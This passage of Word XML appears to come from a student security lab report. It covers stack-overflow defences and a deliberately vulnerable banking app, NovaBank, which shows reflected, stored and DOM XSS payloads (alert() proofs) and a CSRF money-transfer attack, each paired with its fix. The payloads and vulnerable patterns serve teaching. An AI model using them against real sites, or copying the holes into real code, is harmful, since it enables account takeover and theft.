        <w:t>1.6  Defences</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="22316792" w14:textId="5C5F00A3" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>The attack is prevented in practice by the protections that were disabled for this lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CABD3E0" w14:textId="438648B0" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Stack canaries - a random guard value placed before the return address; strcpy overflow corrupts it and the program aborts before returning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FB4687" w14:textId="27CD73D3" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Non-executable stack (NX / DEP) - the CPU refuses to execute instructions located on the stack, so the injected shellcode cannot run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B26064C" w14:textId="0CCC6143" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ASLR and PIE - randomise stack and code addresses each run, so a hard-coded return address no longer points at the sled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220D900A" w14:textId="7D5B9144" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Safer APIs and bounds checking - using strncpy/snprintf with an explicit length, or validating input size, stops the out-of-bounds write at its source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5A5745" w14:textId="16D2C158" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc242295518"/>
      <w:r>
        <w:t>1.7  Note on the brief</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="4F309B72" w14:textId="16C84A8B" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Two instructions in the assignment brief would break a genuinely working exploit; this submission uses the correct engineering and flags the difference:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9E40FA" w14:textId="312F9C20" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>"Fill the NOP region with os.urandom()." Random bytes are not NOPs. A sled must be 0x90 (nop) so the CPU slides forward into the shellcode; random bytes decode as arbitrary instructions and crash. The payload uses 0x90.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35262FD6" w14:textId="150605ED" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>"Simulate the shellcode with subprocess.run([/bin/sh])." That demonstrates nothing about memory corruption. The real exploit injects and executes actual execve("/bin/sh") machine code via the overwritten return address, as shown above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559CFA25" w14:textId="02355063" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="52598B81" w14:textId="5049ADC7" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc242295519"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Part 2 - Web Application Security (NovaBank)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="53F0B564" w14:textId="546B8CC0" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc242295520"/>
      <w:r>
        <w:t>2.1  Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="4CC27DD5" w14:textId="5C623B41" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>NovaBank is a small but real, database-driven banking web application built for this task with Node.js, Express, and SQLite (via the built-in node:sqlite module). It exists in a single codebase with two switchable modes selected at start-up:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AE27D1" w14:textId="4E3A65FA" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>vulnerable mode (npm run vuln) - every vulnerability below works end-to-end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C35891" w14:textId="4229A697" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>safe mode (npm run safe) - the same features, with each vulnerability genuinely fixed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47654677" w14:textId="10EDE6E1" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>A coloured banner makes the active mode obvious: red for vulnerable, green for safe. Every security-relevant branch in the code is marked [VULNERABLE] or [SAFE] so the two versions can be compared side by side. The application demonstrates reflected, stored and DOM-based XSS; CSRF; and SQL injection at easy, intermediate and advanced levels - each shown succeeding in vulnerable mode and blocked in safe mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D636E3" w14:textId="0CE7E516" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="374C4693" wp14:editId="4A4793C5">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="1756764455"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6764455" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6489DF84" w14:textId="1850A4F2" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.1 - NovaBank login page in vulnerable mode (red banner). The same page in safe mode shows a green "defenses ON" banner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD1A30B" w14:textId="2E68ABF9" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Demo accounts (passwords are stored in plaintext on purpose, only so the SQL-injection data-extraction stage is demonstrable): alice / Password123!, bob / hunter2, admin / S3cr3t-Admin!.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D01EC1" w14:textId="69389061" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc242295521"/>
      <w:r>
        <w:t>2.2  Cross-Site Scripting - Reflected</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="55D247E6" w14:textId="7F1D3604" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Location: GET /search?q=   The search term is written back into the results heading. In vulnerable mode it is interpolated into the HTML without encoding, so any markup in the term is parsed and executed by the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C12DFC9" w14:textId="1B1FD6EC" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Payload:   &lt;img src=x onerror=alert('Reflected-XSS')&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166CCC84" w14:textId="66EE92EE" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Because the broken image fails to load, its onerror handler runs the attacker's JavaScript:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1586D6CE" w14:textId="0F18B75E" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="423F3F87" wp14:editId="54EAAEFA">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="383769286"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3769286" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3F91F0" w14:textId="4DCE7842" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.2 - Vulnerable mode: the reflected payload executes and the alert('Reflected-XSS') dialog fires. The payload is visible in the address bar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0BD1CA" w14:textId="637C0A1F" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Fix (safe mode): the term is HTML-encoded on output with an escape function that converts &lt; &gt; &amp; " ' to their HTML entities. The same payload is then shown as literal text and never parsed as markup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3313A5B1" w14:textId="038DA9E8" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CBBD064" wp14:editId="11967A9E">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="1023717219"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3717219" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3ED1E9" w14:textId="17079B02" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.3 - Safe mode: the identical payload is displayed as inert text; no script executes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E75C09" w14:textId="07C29632" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc242295522"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.3  Cross-Site Scripting - Stored</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="1C43ECDF" w14:textId="74E2EF04" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Location: POST /support  -&gt;  rendered on GET /support for every visitor. A message body is saved to the database and later rendered raw, so the injected script runs for anyone who opens the support page - a persistent attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E0B810" w14:textId="5201FF99" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Payload:   &lt;script&gt;alert('Stored-XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673DA317" w14:textId="0C3FC198" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04F299A6" wp14:editId="15DE70B5">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="1946684166"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46684166" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="331CDAF4" w14:textId="75088300" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.4 - Vulnerable mode: the stored payload executes on view. The URL is simply /support with no payload in it, confirming the script came from the database (stored), not the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465E95C6" w14:textId="35A49CCE" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Fix (safe mode): the stored body is HTML-encoded when it is rendered. Storing raw input is acceptable; the defence is encoding on output, which turns the stored markup into harmless text:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA0EB17" w14:textId="6C69D487" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="330B22C6" wp14:editId="661384E7">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="257561593"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7561593" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE4AC61" w14:textId="01B5C72E" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.5 - Safe mode: the stored message is shown verbatim as text; the script tags do not execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D808475" w14:textId="26665D50" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc242295523"/>
      <w:r>
        <w:t>2.4  Cross-Site Scripting - DOM-based</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="3D29C7CD" w14:textId="06E2CE2E" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Location: GET /profile  -&gt;  public/dom-xss.js. The vulnerability is entirely client-side: a script reads the URL fragment (everything after #, which never reaches the server) and assigns it to element.innerHTML, a dangerous DOM sink.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6678D2C5" w14:textId="443AC534" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Payload:   /profile#&lt;img src=x onerror=alert('DOM-XSS')&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7398CCF7" w14:textId="2A799294" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14F90073" wp14:editId="7EA048BD">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="1777288348"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7288348" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="337B0C7E" w14:textId="129B0602" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.6 - Vulnerable mode: the fragment is parsed as HTML via innerHTML and the alert('DOM-XSS') fires. The payload lives only in the URL fragment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6688CBD6" w14:textId="2900BA05" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Fix (safe mode): the same value is assigned with element.textContent instead of innerHTML. textContent never parses HTML, so the fragment is shown as text:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701EB256" w14:textId="490ED381" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58D4E36A" wp14:editId="51AD40EB">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="2001829002"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1829002" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B68F9F" w14:textId="3AB07332" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.7 - Safe mode: the fragment is rendered as literal text in the bio preview; no script runs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4BAE0C" w14:textId="4160D3BB" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc242295524"/>
      <w:r>
        <w:t>2.5  Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="496B5A46" w14:textId="73E188A3" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Location: POST /transfer (a state-changing action - moving money). In vulnerable mode the endpoint performs the transfer purely on the strength of the session cookie, with no unguessable token to prove the request was intended. A malicious page that auto-submits a hidden form can therefore move a logged-in victim's money without consent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778827D8" w14:textId="3D6D8626" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Attack: while logged in as alice (balance $5230.75), the victim opens a malicious page that auto-submits a transfer of $500 to NB-1000-ATTACKER.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E0300F" w14:textId="4D1E5DC7" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="210070A3" wp14:editId="486B2668">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="125389471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3894719" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D55C9C1" w14:textId="7F29BF69" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.8 - Before: alice's balance is $5230.75.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622B574A" w14:textId="7DDC7CF1" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EB23333" wp14:editId="25DA7299">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="1677481898"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7481898" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
